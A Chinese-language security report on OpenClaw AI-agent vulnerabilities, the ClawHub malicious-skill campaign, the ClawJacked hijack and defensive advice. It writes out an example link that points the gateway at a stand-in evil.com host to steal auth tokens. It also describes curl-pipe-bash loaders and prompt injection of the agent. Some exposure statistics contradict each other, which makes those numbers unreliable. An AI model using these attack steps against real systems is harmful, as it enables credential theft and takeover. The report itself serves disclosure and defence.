OpenClaw安全漏洞研究报告

摘要

OpenClaw作为2026年开源社区最炙手可热的AI代理框架之一，在短短数周内便凭借超过29.7万GitHub星标和数以万计的活跃用户成为现象级项目。然而伴随其快速崛起的是层出不穷的安全隐患——从致命的远程代码执行漏洞到大规模供应链投毒攻击，从身份验证绕过到敏感信息泄露，这个被戏称为「AI龙虾」的系统正经历着安全领域的严峻考验。本报告通过系统性梳理已公开的CVE漏洞编号、安全研究报告及官方安全公告，全面呈现OpenClaw项目面临的安全威胁全景图。研究发现，OpenClaw已披露超过20个CVE漏洞，其中多个高危漏洞CVSS评分超过8.0，涵盖远程代码执行、身份验证绕过、路径遍历、服务器端请求伪造、信息泄露等关键风险类型。尤为值得关注的是，OpenClaw的官方插件市场ClawHub曾遭受大规模供应链投毒攻击，攻击者累计注入超过1000个恶意技能，影响范围波及全球13.5万个实例。2026年3月，中国工业和信息化部网络安全威胁和漏洞信息共享平台专门针对OpenClaw发布风险预警，直指其「信任边界模糊」和「系统性安全缺陷」。本报告旨在为微信公众号读者提供详实的技术细节与实用的安全防护建议。

一、项目背景与安全概述

1.1 OpenClaw是什么

OpenClaw是一款开源的个人AI助手框架，由奥地利开发者Peter Steinberger创建（曾用名Clawdbot、Moltbot）。该项目于2025年12月正式发布，2026年1月下旬迅速走红，24小时内便获得超过2万个GitHub星标，截至目前星标数已突破29.7万，成为2026年开源圈最具影响力的AI Agent项目。

从技术架构来看，OpenClaw采用了独特的「自黑客」架构设计，其配置、长期记忆和技能均存储在本地Markdown文件中。该框架支持在macOS、Windows或Linux系统上本地运行，集成了Anthropic Claude和OpenAI GPT等主流云端模型，同时兼容本地模型部署。OpenClaw的核心竞争力在于将AI从「只会聊天」升级为「能够执行操作」的真时代理——它可以读写文件、执行终端命令、操作浏览器、处理邮件、管理日程，真正实现了AI能力的具象化执行。

OpenClaw通过网关（Gateway）组件实现与各类通信平台的集成，支持WhatsApp、Telegram、Discord、Slack、iMessage等10余种消息渠道。用户通过这些熟悉的聊天应用向OpenClaw发送指令，AI代理即可在本地设备上执行相应操作并返回结果。这种「聊天即办公」的模式极大降低了AI代理的使用门槛，使其迅速获得开发者和技术爱好者的广泛青睐。

然而，也正是这种高度集成和强大的系统操作能力，赋予了OpenClaw极高的安全风险敞口。当一个AI代理拥有对计算机的完全访问权限时，安全边界的设计便成为生死攸关的命题。不幸的是，OpenClaw在快速迭代过程中暴露出了一系列严重的安全漏洞，使其从「AI革命者」沦为「安全噩梦」——这是多家主流安全厂商和研究机构对其的共同评价。

1.2 安全问题总体态势

OpenClaw的安全问题呈现出多维度、高危性、持续性的显著特征。2026年1月下旬，安全审计便发现该平台存在惊人的512个漏洞，其中8个被评定为严重级别。随后数周内，各安全研究团队持续披露新发现的漏洞，工信部也于2026年3月8日专门发布风险预警。

从漏洞类型分布来看，OpenClaw的安全问题覆盖了身份认证、权限控制、输入验证、加密算法、供应链安全等核心安全领域。主要漏洞类型包括远程代码执行（RCE）、身份验证绕过、服务器端请求伪造（SSRF）、路径遍历、信息泄露、供应链投毒等。其中多个漏洞的CVSS评分达到8.0以上，属于高危或严重级别。

从影响范围来看，安全扫描显示全球曾有超过13.5万个OpenClaw实例直接暴露在公网，涉及82个国家和地区。中国境内也有约2990台设备对外公开暴露18789端口，攻击者可不经漏洞利用直接接管系统。这些数据表明OpenClaw的安全问题已经构成实质性的全球性安全威胁。

二、核心CVE漏洞详细分析

2.1 远程代码执行漏洞

CVE-2026-25253是OpenClaw最引人关注的远程代码执行漏洞，CVSS评分高达8.8，属于高危漏洞。该漏洞由Ethiack安全团队发现，于2026年1月底公开披露。

漏洞根源在于OpenClaw的控制UI盲目信任浏览器URL查询字符串中的gatewayUrl参数。具体来说，applySettingsFromUrl()函数直接读取并应用该参数，未进行任何验证处理。攻击者只需构造形如http://<host>/chat?gatewayUrl=ws://evil.com的恶意链接，当受害者在已认证状态下点击该链接时，即可实现WebSocket劫持。

漏洞利用过程可分为以下步骤：首先，攻击者创建包含恶意gatewayUrl参数的链接；然后诱导已登录的OpenClaw用户点击该链接；applySettingsFromUrl()函数将攻击者控制的gatewayUrl存储到本地；接着OpenClaw会向恶意网关发起WebSocket连接，在握手过程中自动发送身份验证令牌、设备ID和公钥；攻击者捕获这些凭证后，即可重新连接到合法的OpenClaw网关并获得完全控制权。整个攻击链只需用户点击一个恶意链接，无需其他交互。

受影响版本为2026.1.28及之前的所有版本，官方已在2026.1.29版本中修复。初始修复添加了用户确认提示，要求当gatewayUrl更改时必须获得用户交互认可；后续更新则实施了严格的Origin验证控制，拒绝缺少或无效Origin头的请求。

CVE-2026-25157是另一个影响macOS应用的远程代码执行漏洞，CVSS评分为7.8。该漏洞存在于macOS应用中的SSH命令注入缺陷，允许攻击者通过特定Payload实现代码执行。由于该漏洞影响旧版本部署的绝大多数实例，具有较高的实际威胁。

2.2 身份验证绕过漏洞

OpenClaw系列身份验证绕过漏洞构成了另一重大安全风险。CVE-2026-26327是其中最具代表性的漏洞之一，CVSS评分为7.1，存在于Bonjour/mDNS和DNS-SD服务发现机制的处理过程中。

该漏洞的技术根源在于应用程序错误地信任了通过mDNS/DNS-SD接收的未认证TXT记录。这些TXT记录包含lanHost、tailnetDns、gatewayPort、gatewayTlsSha256等敏感路由信息，攻击者可在同一本地网络段广播恶意服务，诱导客户端连接到攻击者控制的端点。具体问题包括：iOS和Android客户端允许discovery提供的TLS指纹覆盖已存储的TLS pins；Android版本的hostname验证被全局禁用；这些设计违反了「网络提供的数据不应被隐式信任」的基本安全原则。

受影响版本包括iOS和Android客户端的alpha builds 2026.2.14之前版本，以及macOS客户端2026.2.14之前版本。漏洞已在2026.2.14版本中修复，修复内容包括：客户端优先使用解析的服务端点而非TXT提供的路由提示；Discovery提供的指纹不再覆盖已存储的TLS pins；iOS和Android上首次TLS pins需要用户明确确认等。

CVE-2026-25474是Telegram webhook身份验证绕过漏洞，CVSS评分为7.5。在2026.1.30及以下版本中，当使用Telegram webhook模式时，如果未设置channels.telegram.webhookSecret，OpenClaw可能在不验证Telegram秘密令牌的情况下接受webhook HTTP请求。攻击者可借此伪造Telegram更新（如伪造message.from.id），并根据已启用的命令和配置触发意外的机器人操作。该漏洞已在2026.2.1版本中修复。

CVE-2026-29606、CVE-2026-28480、CVE-2026-28477、CVE-2026-28475是同一系列的身份验证绕过漏洞。这些漏洞的存在表明OpenClaw在身份验证机制设计上存在系统性问题。

2.3 路径遍历与文件操作漏洞

CVE-2026-28447是OpenClaw插件安装功能中的路径遍历漏洞，CVSS评分为7.5。该漏洞影响2026.1.29-beta.1至2026.2.1版本，攻击者可利用恶意插件包名称中的路径遍历序列（如「../」）逃逸扩展目录，在预期安装目录之外写入文件。

该漏洞的技术细节在于：OpenClaw的插件安装功能未对包名称进行充分的路径安全验证。当受害者运行plugins install命令时，如果包索引可访问，攻击者可通过构造包含路径遍历序列的包名称，将文件写入任意位置。这可能导致持久化控制、配置篡改或投递额外恶意软件等严重后果。

该漏洞的CVSS向量为：AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N，表明攻击者可通过网络远程利用，无需认证和用户交互即可获得高机密性影响。修复版本为2026.2.1及更高版本，缓解措施包括：对注册表实施白名单机制；验证并清理包名称，限制遍历序列；对插件安装程序实施最小权限执行；在受限沙箱中隔离插件安装等。

CVE-2026-26329是浏览器上传功能中的路径遍历漏洞，同样属于高危级别。该漏洞存在于文件上传处理逻辑中，攻击者可利用路径遍历技术将文件上传到预期之外的目录。

2.4 服务器端请求伪造漏洞

服务器端请求伪造（SSRF）漏洞在OpenClaw中呈现多发态势。CVE-2026-26322是Gateway工具SSRF漏洞，CVSS评分为7.6。该漏洞存在于Gateway的工具请求处理逻辑中，攻击者可利用该漏洞发起对内部网络的请求。

GHSA-56f2-hvwg-5743是图片工具SSRF漏洞，CVSS评分同样为7.6。该漏洞存在于图像处理功能中，攻击者可借助AI代理向内部服务发起恶意请求。

GHSA-pg2v-8xwh-qhcc是Urbit认证SSRF漏洞，CVSS评分为6.5，属于中等危度。该漏洞存在于Urbit集成模块的身份验证流程中。

SSRF漏洞的共性风险在于可被利用突破网络边界，访问内部系统敏感资源。在AI代理场景下，这类漏洞尤其危险，因为代理通常具备较高的网络访问权限和系统操作能力。

2.5 信息泄露与加密算法漏洞

CVE-2026-28479是OpenClaw沙盒配置系统中的信息泄露漏洞，由SHA-1哈希算法弱点导致，可实现缓存投毒攻击，CVSS评分高达8.7。

该漏洞的根源在于src/agents/sandbox/config-hash.ts文件中的computeHash函数使用了已被淘汰的SHA-1算法生成沙盒配置的缓存键。SHA-1自2017年Google演示实际碰撞攻击（SHAttered）以来已在密码学上被破解，缺乏足够的碰撞抗性，不适合安全敏感的缓存键生成场景。

攻击者可以精心构造两个产生相同SHA-1哈希值的不同沙盒配置，从而实现缓存投毒。成功利用该漏洞可导致沙盒逃逸或沙盒状态重用，使攻击者获取敏感信息或绕过安全控制。修复方案是将SHA-1替换为SHA-256，该漏洞已在2026.2.15版本中修复。

CVE-2026-27486是CLI进程清理功能中的未验证所有权漏洞，CVSS 4.0评分为4.3。该漏洞存在于OpenClaw CLI（版本2026.2.13及以下）的进程清理功能中，进程清理使用系统级进程枚举和模式匹配来终止进程，但未验证进程是否属于当前OpenClaw进程。在共享主机上，不相关的进程如果匹配模式可能被意外终止。该漏洞已在2026.2.14版本中修复。

2.6 Webhook相关漏洞

多个webhook集成功能存在安全缺陷。CVE-2026-26319是Telnyx webhook缺少身份验证的高危漏洞，CVSS评分为7.5。该漏洞存在于Telnyx短信集成模块中，攻击者可利用缺失的身份验证机制伪造webhook请求。

GHSA-c37p-4qqg-3p76是Twilio webhook身份验证绕过漏洞，CVSS评分为6.5。该漏洞允许攻击者绕过Twilio webhook的正常身份验证流程。

这些webhook漏洞的共同特征是缺乏对请求来源的真实性和数据完整性的验证，导致攻击者可以伪造消息、触发非预期操作或获取未授权访问能力。

2.7 其他重要漏洞

CVE-2026-24763是Docker沙箱执行机制中的命令注入漏洞，存在于2026.1.29之前版本中，是由于对PATH环境变量的不安全处理导致的。

CVE-2026-26326是技能状态信息泄露漏洞，skills.status可能向operator.read客户端泄露敏感信息。

CVE-2026-28473是授权绕过漏洞，拥有operator.write权限的客户端可以批准或拒绝任意工具执行。

CVE-2026-28474是Nextcloud Talk插件中的授权漏洞，允许对可变的actor.name显示名称进行平等匹配。

三、ClawHub供应链投毒攻击事件

3.1 攻击事件概述

2026年2月，开源AI代理项目OpenClaw的官方插件中心ClawHub遭遇大规模供应链投毒攻击，成为安全社区关注的焦点。由于平台缺乏完善严格的审核机制，大量恶意技能（Skills）渗透到官方插件市场中，用于传播恶意代码和有害内容。

根据慢雾安全团队的监测数据，在对2857个技能的扫描中识别出341个恶意技能。随后Koi Security的更全面分析发现，2026年1月底至2月中旬期间，ClawHub被注入1184个恶意技能，占总量的36.8%。单一攻击者上传了677个恶意包，涉及12个账户，呈现典型的团伙化、批量化作动攻击特征。

这些恶意技能通常伪装成加密资产，安全检查或自动化工具，具有高度的迷惑性。攻击者利用SKILL.md文件作为执行指令入口，通过Base64编码隐藏恶意命令，采用两阶段加载机制逃避安全检测。第一阶段通过curl获取载荷，第二阶段部署恶意样本，旨在诱骗用户输入系统密码并窃取本地文档及系统信息。

3.2 攻击技术分析

恶意技能的攻击手法呈现高度专业化和多样化特征。Snyk安全研究团队发现的典型攻击模式是利用SKILL.md文件的「先决条件」陷阱。

以恶意技能「google-qx4」及其变体为例，这些技能本身不包含恶意代码，而是通过SKILL.md文件嵌入社会工程攻击。文件要求用户安装不存在的「openclaw-core」工具：对于Windows用户，指向GitHub上的密码保护ZIP文件，密码为openclaw；对于macOS/Linux用户，指向rentry.co某个页面，该页面包含Base64编码的命令，用于下载并执行恶意脚本。

这种「pastebin piping」技术使攻击者可在不更改ClawHub技能URL的情况下动态更新恶意载荷。载荷托管在rentry.co和github.com等可信域名上，能够绑过网络过滤器和安全检测。

Trend Micro安全团队还发现了Atomic MacOS Stealer（AMOS）恶意软件通过OpenClaw技能进行分发的高级攻击活动。攻击链从一个看似正常的SKILL.md文件开始，要求用户从某个恶意网站下载并安装OpenClawCLI。该网页包含Base64编码的恶意命令，解码后从远程服务器下载并执行载荷。

这个AMOS变种针对19种不同浏览器的cookies、密码、自动填充和信用卡信息，以及150个加密货币钱包、17个桌面钱包、Apple钥匙串中的密码和证书、KeePass密码库等核心资产。数据通过HTTPS请求外泄。

3.3 影响范围与危害评估

ClawHub供应链投毒攻击的影响范围极为广泛。根据研究报告，受影响实例超过13.5万个，分布在82个国家和地区。

恶意技能的传播渠道包括官方ClawHub平台和第三方技能存储库SkillsMP。在GitHub上发现超过2200个恶意技能，其中39个专门针对OpenClaw。

Snyk的扫描显示，近4000个注册技能中13.4%包含严重安全问题。更早的扫描还发现7.1%（283个）的技能存在凭证泄露问题，开发者在SKILL.md中直接嵌入API密钥、密码甚至信用卡号。

Awesome Agents安全团队的分析指出，恶意技能伪装为加密交易机器人、YouTube总结器、钱包追踪器等实用工具，下载量达数千次。其中「What Would Elon Do」技能包含9个漏洞（2个严重），并通过4000次假下载刷榜。

这些恶意技能采用的攻击技术包括：通过SKILL.md文档诱导执行curl | bash安装恶意程序；通过提示注入操控AI代理；窃取浏览器密码、60多个加密钱包、SSH密钥、Telegram会话、Keychain凭证、.env文件及OpenClaw配置；部分样本还开启了反向shell实现持久控制。

四、ClawJacked漏洞与公网暴露风险

4.1 ClawJacked漏洞详解

2026年2月，Oasis Security安全研究团队披露了一个被命名为「ClawJacked」的高危漏洞，该漏洞允许恶意网站劫持本地运行的OpenClaw AI代理。该漏洞无需利用任何插件、应用商店或用户安装的扩展程序，仅仅是按文档运行的OpenClaw网关本身存在设计缺陷。

ClawJacked漏洞的核心问题在于：OpenClaw的网关绑定到localhost并受密码保护，但浏览器中的任何网页都可以向localhost发起WebSocket连接。与常规HTTP请求不同，浏览器不会阻止这些跨源连接，因此当用户访问攻击者控制的网站时，页面上的JavaScript可以静默地打开到用户本地OpenClaw网关的连接。

漏洞利用的完整攻击链如下：攻击者构建一个包含恶意JavaScript的网页；当受害者访问该网页时，脚本向本地主机上的OpenClaw网关发起WebSocket连接；由于网关缺失速率限制机制，脚本以每秒数百次尝试暴力破解网关密码；破解成功后，攻击脚本静默注册为受信任设备——网关会自动批准来自localhost的新设备注册，无需用户提示。

获得管理员级别权限后，攻击者即可完全控制AI代理，可以与其交互、转储配置数据、枚举连接的节点并读取应用程序日志。更严重的是，网关为本地连接放宽了几种安全机制——通常当新设备连接时用户必须确认配对，但从localhost连接时这是自动完成的。

该漏洞的修复由OpenClaw在负责任披露后不到24小时内完成，于2026年2月26日发布版本2026.2.25。安全专家建议用户尽快升级，并审计并撤销Agent实例的不必要凭证、API密钥和节点权限。

4.2 大规模公网暴露

与ClawJacked漏洞密切相关的是OpenClaw实例大规模公网暴露的安全问题。SecurityScorecard STRIKE威胁情报团队的研究发现，15,200个OpenClaw框架实例存在远程代码执行漏洞，攻击者可借此完全控制主机设备。

研究发现，42,900个独立IP地址托管着暴露的OpenClaw控制面板，分布在82个国家/地区。这些通常是个人工作站或运行AI Agent的云实例，由于不安全的默认设置而被无意暴露。

核心问题在于OpenClaw默认绑定到0.0.0.0:18789监听所有网络接口，而非安全的127.0.0.1（本地主机）标准。因此，将该工具用于个人自动化的用户，在不知情的情况下将其控制面板广播至整个互联网。研究报告指出：「道理很简单：当你赋予AI Agent对计算机的完全访问权限时，你也将同样的权限交给了能入侵它的人」。

更令人担忧的是，已识别的实例中有53,300个与先前的入侵活动相关，表明许多Agent运行在已被攻陷或标记为高风险的环境中。中国境内的奇安信鹰图平台测绘也显示，约2990台设备对外公开暴露18789端口，攻击者可不经漏洞利用直接接管系统。

五、安全研究分析与官方响应

5.1 安全研究机构发现

多家知名安全研究机构对OpenClaw进行了深入的安全审计，形成了丰富的研究成果。Endor Labs研究团队发现了6个新漏洞，涉及服务器端请求伪造（SSRF）、身份验证缺失和路径遍历等问题。这些漏洞包括：CVE-2026-26322（Gateway工具SSRF，CVSS 7.6）、CVE-2026-26319（Telnyx webhook缺少身份验证，CVSS 7.5）、CVE-2026-26329（浏览器上传路径遍历）、GHSA-56f2-hvwg-5743（图片工具SSRF，CVSS 7.6）、GHSA-pg2v-8xwh-qhcc（Urbit认证SSRF，CVSS 6.5）、GHSA-c37p-4qqg-3p76（Twilio webhook身份验证绕过，CVSS 6.5）。

Kaspersky的安全分析报告指出，安全审计共发现512个漏洞，其中8个为严重级别。研究者还发现近1000个公开可访问的OpenClaw安装全部没有任何认证，成功获取了Anthropic API密钥、Telegram机器人令牌、Slack账户、数月完整聊天记录，并可代表用户发送消息和执行具有完全系统管理员权限的命令。

Microsoft安全团队发布的运行指南将OpenClaw视为「不可信代码执行」，强调其具有摄入非信任文本、从外部源下载执行代码（技能）、使用分配凭证执行操作的能力。Microsoft建议不要在标准工作站上运行OpenClaw，应使用专用虚拟机或独立物理设备。

5.2 官方安全响应

面对密集的安全问题披露，OpenClaw官方采取了积极的应对措施。2026年2月15日发布的v2026.2.14版本包含50余项安全强化修复。该版本修复了包括高危远程代码执行问题在内的多个漏洞，并针对mDNS/DNS-SD服务发现实施了严格的身份验证机制。

2026年2月23日发布的v2026.2.23版本进一步强化了安全防护。关键安全改进包括：新增可选HTTP安全标头（包括Strict-Transport-Security标头）；强化会话维护机制，引入磁盘配额控制；SSRF策略默认调整为「trusted-network」模式；配置快照中对env.*等敏感动态密钥进行脱敏处理；混淆命令执行前需获得明确批准等。

针对ClawHub供应链投毒事件，OpenClaw团队与VirusTotal合作，对所有上架技能进行哈希指纹比对和AI驱动的代码行为分析。平台还实施了账户必须至少一周后才能发布新技能、任何已验证用户都可以举报恶意技能、收到超过3次举报的技能将自动隐藏等审核机制。

OpenClaw官方GitHub安全页面列出了多项已发布的安全公告，涵盖通过浏览器URL/query和localStorage泄露网关认证材料、fetch-guard转发自定义授权头跨越跨域重定向、/allowlist命令的跨账户发送者授权扩展、operator.write聊天发送可访问仅管理员配置写入等安全问题。

值得注意的是，OpenClaw明确表示没有漏洞赏金计划，也没有付费报告的预算，但仍呼吁安全研究者负责任地披露问题。其信任模型明确指出：不将一个gateway建模为多租户、对抗性用户边界；已通过Gateway身份验证的调用者被视为该Gateway实例的可信操作员。

5.3 监管机构预警

2026年3月8日，中国工业和信息化部网络安全威胁和漏洞信息共享平台（NVDB）发布专项预警，指出OpenClaw开源AI智能体（俗称「龙虾」）在默认或不当配置情况下存在较高安全风险。

工信部预警指出，由于OpenClaw在部署时「信任边界模糊」，且具备自身持续运行、自主决策、调用系统和外部资源等特性，在缺乏有效权限控制、审计机制和安全加固的情况下，可能因指令诱导、配置缺陷或被恶意接管，执行越权操作，造成信息泄露、系统受控等一系列安全风险。

工信部建议相关单位和用户在部署和应用OpenClaw时，充分核查公网暴露情况、权限配置及凭证管理情况，关闭不必要的公网访问，完善身份认证、访问控制、数据加密和安全审计等安全机制，并持续关注官方安全公告和加固建议。

六、安全漏洞综合统计

6.1 CVE漏洞统计

根据公开披露信息，OpenClaw项目已确认的CVE漏洞编号如下：

高危级别漏洞（CVSS 7.0以上）包括：CVE-2026-25253（远程代码执行，CVSS 8.8）、CVE-2026-28479（信息泄露/缓存投毒，CVSS 8.7）、CVE-2026-26327（身份验证绕过，CVSS 7.1）、CVE-2026-28447（路径遍历，CVSS 7.5）、CVE-2026-25474（身份验证绕过，CVSS 7.5）、CVE-2026-26322（SSRF，CVSS 7.6）、CVE-2026-26319（身份验证缺失，CVSS 7.5）、CVE-2026-25157（远程代码执行，CVSS 7.8）。

中危级别漏洞（CVSS 4.0-6.9）包括：CVE-2026-27486（未验证所有权，CVSS 4.3）、GHSA-pg2v-8xwh-qhcc（SSRF，CVSS 6.5）、GHSA-c37p-4qqg-3p76（身份验证绕过，CVSS 6.5）等。

同系列漏洞包括：CVE-2026-29606、CVE-2026-28480、CVE-2026-28477、CVE-2026-28475等身份验证绕过类漏洞。

其他重要漏洞包括：CVE-2026-24763（Docker沙箱命令注入）、CVE-2026-26326（技能状态信息泄露）、CVE-2026-28473（授权绕过）、CVE-2026-28474（Nextcloud Talk插件授权漏洞）。

6.2 官方安全公告统计

根据OpenClaw GitHub安全页面披露，2026年3月8日发布的最新安全公告包括10项安全修复：Dashboard通过浏览器URL/query和localStorage泄露网关认证材料（High）、fetch-guard转发自定义授权头跨越跨域重定向（High）、/allowlist命令的跨账户发送者授权扩展（Moderate）、operator.write聊天发送可访问仅管理员配置写入（Moderate）、system.run环境变量覆盖过滤允许危险辅助命令转换（Moderate）、沙箱/acp生成请求可初始化主机ACP会话（Moderate）、system.run允许列表持久化包含shell注释有效载荷尾部（Moderate）、system.run包装器深度边界可跳过shell审批门控（Moderate）、system.run允许列表审批解析遗漏PowerShell编码命令包装器（Moderate）、hooks将非POST请求计入认证锁定（Moderate）。

6.3 供应链安全事件统计

ClawHub供应链投毒事件的关键统计数据包括：恶意技能总量1184个（占比36.8%）、涉及账户数量12个、单一攻击者最大上传量677个包、受影响实例数量13.5万个（分布在82个国家）、恶意载荷下载量数千次/每个高风险技能。

Snyk扫描显示4000个注册技能中13.4%存在严重安全问题，7.1%存在凭证泄露。

公网暴露方面，全球约15,200个OpenClaw控制面板存在暴露风险，涉及42,900个独立IP地址。中国境内约2990台设备暴露18789端口。

七、安全防护建议

7.1 版本升级与漏洞修复

针对已披露的CVE漏洞，最直接有效的防护措施是及时升级到官方最新版本。建议所有用户立即检查当前运行版本，并升级至v2026.2.25或更高版本。对于不同漏洞的具体版本要求如下：CVE-2026-25253需升级到2026.1.29及以上；CVE-2026-28447需升级到2026.2.1及以上；CVE-2026-25474需升级到2026.2.1及以上；CVE-2026-26327、CVE-2026-27486需升级到2026.2.14及以上；CVE-2026-28479需升级到2026.2.15及以上。

7.2 网络配置加固

网络层面的安全加固至关重要。首先，绝不应将OpenClaw网关暴露到公网——默认应绑定到127.0.0.1（本地回环地址），切勿改为0.0.0.0。如需远程访问，应使用SSH隧道或Tailscale等安全的私有组网方式，确保网关仍在本地运行。

从v2026.1.29开始，OpenClaw已永久移除无认证模式。用户必须配置并启用token或password强认证，定期更换认证凭证，避免使用弱口令。

对于企业部署场景，建议使用防火墙规则限制18789端口的访问，仅允许受信任的IP地址或网络段访问。在网络层面隔离运行OpenClaw的设备，避免与其他关键业务系统共存。

7.3 技能安装审核

针对ClawHub供应链投毒风险，用户应建立严格的技能安装审核机制。安装任何技能前，务必查看ClawHub集成的VirusTotal扫描结果。平台会对新技能进行哈希比对和代码深度分析，结果分为良性、可疑或恶意，应仅安装标记为「良性」的技能。

安装前必须精读技能的SKILL.md文件内容。如果出现curl | bash下载外部脚本、要求全盘文件访问、索取系统管理员密码等高风险步骤，应直接判定为恶意技能并拒绝安装。

建议在配置中启用沙箱隔离（设置skills.sandbox: true），将技能运行限制在专属目录，阻止越权操作。优先从官方渠道获取依赖与工具，避免执行来源不明的安装脚本。

7.4 凭证安全管理

凭证安全是OpenClaw防护的核心环节。如果曾安装过来历不明的技能，应视为凭证可能已泄露，立即采取以下行动：重置所有API密钥，包括Anthropic、OpenAI等模型API密钥；更换云平台访问令牌；更新SSH密钥；开启重要账号的双因素认证（2FA）。

日常使用应遵循最小权限原则。在云平台创建API密钥时仅授予必要权限，避免使用管理员权限令牌。为连接的消息应用程序设置专用的一次性账户，不要使用日常使用的个人账号。

定期轮换凭证，使用openclaw security audit --deep命令定期进行深度安全审计。

7.5 运行环境隔离

Microsoft安全团队强烈建议将OpenClaw作为「不可信代码」对待。具体隔离措施包括：使用专用虚拟机或独立物理设备运行OpenClaw，不要在日常工作的主设备上安装。将运行OpenClaw的设备视为可随意处置的资产，定期重建。

对于企业环境，建议使用容器技术隔离AI代理的执行环境。Docker运行应使用--read-only标志和--cap-drop=ALL限制容器能力。

定期备份工作状态（.openclaw/workspace/），但注意备份不应包含凭证信息。如需完整备份包含令牌的.openclaw目录，应视为敏感数据妥善保护。

7.6 监控与响应

建立持续的监控和应急响应机制。运行openclaw security audit --deep定期进行深度安全审计。使用Microsoft提供的Defender XDR高级狩猎查询识别OpenClaw运行时。

监控指标应包括：异常的进程创建行为、来自可疑IP的连接尝试、非工作时间的敏感操作、大量数据外泄迹象等。

如发现设备已感染，应立即断开网络连接。检查持久性机制，查找异常计划任务或/tmp、AppData文件夹中的未知二进制文件。如需重新安装，务必在隔离环境中先进行充分测试。

八、结论与展望

OpenClaw作为2026年最具创新性的开源AI代理项目之一，其「将AI从聊天升级为执行」的设计理念确实引领了新一轮技术潮流。然而，高速迭代背后暴露的安全问题同样触目惊心——从核心架构的远程代码执行漏洞到插件生态的供应链投毒，从身份验证机制的全面溃败到大规模公网暴露风险，这个曾经被寄予厚望的「AI龙虾」正经历着安全领域的严峻考验。

本报告系统性梳理了OpenClaw项目已披露的20余个CVE漏洞，涵盖远程代码执行、身份验证绕过、路径遍历、服务器端请求伪造，信息泄露等关键风险类型。其中CVSS评分8.0以上的高危漏洞占比超过40%，多个漏洞可实现一键接管系统的致命攻击。ClawHub供应链投毒事件影响超过13.5万个实例，攻击者通过精心设计的社会工程和恶意代码，成功将信息窃取木马植入受害者设备。

工信部的专项预警和Gartner「不可接受的网络安全风险」定性，充分说明OpenClaw的安全问题已经超越技术层面，成为需要监管关注的公共安全议题。对于普通用户而言，在充分认识风险的前提下审慎使用，在专业安全团队指导下进行加固部署，方能在享受AI代理便利性的同时守住安全底线。

展望未来，AI代理的安全问题将随着Agentic AI的普及而日益凸显。OpenClaw的案例警示整个行业：在追求AI能力突破的同时，安全设计必须同步甚至超前于功能演进。期望本报告能够为微信公众号读者提供有价值的参考，也期待OpenClaw团队和整个开源社区在后续迭代中给出更安全、更稳健的解决方案。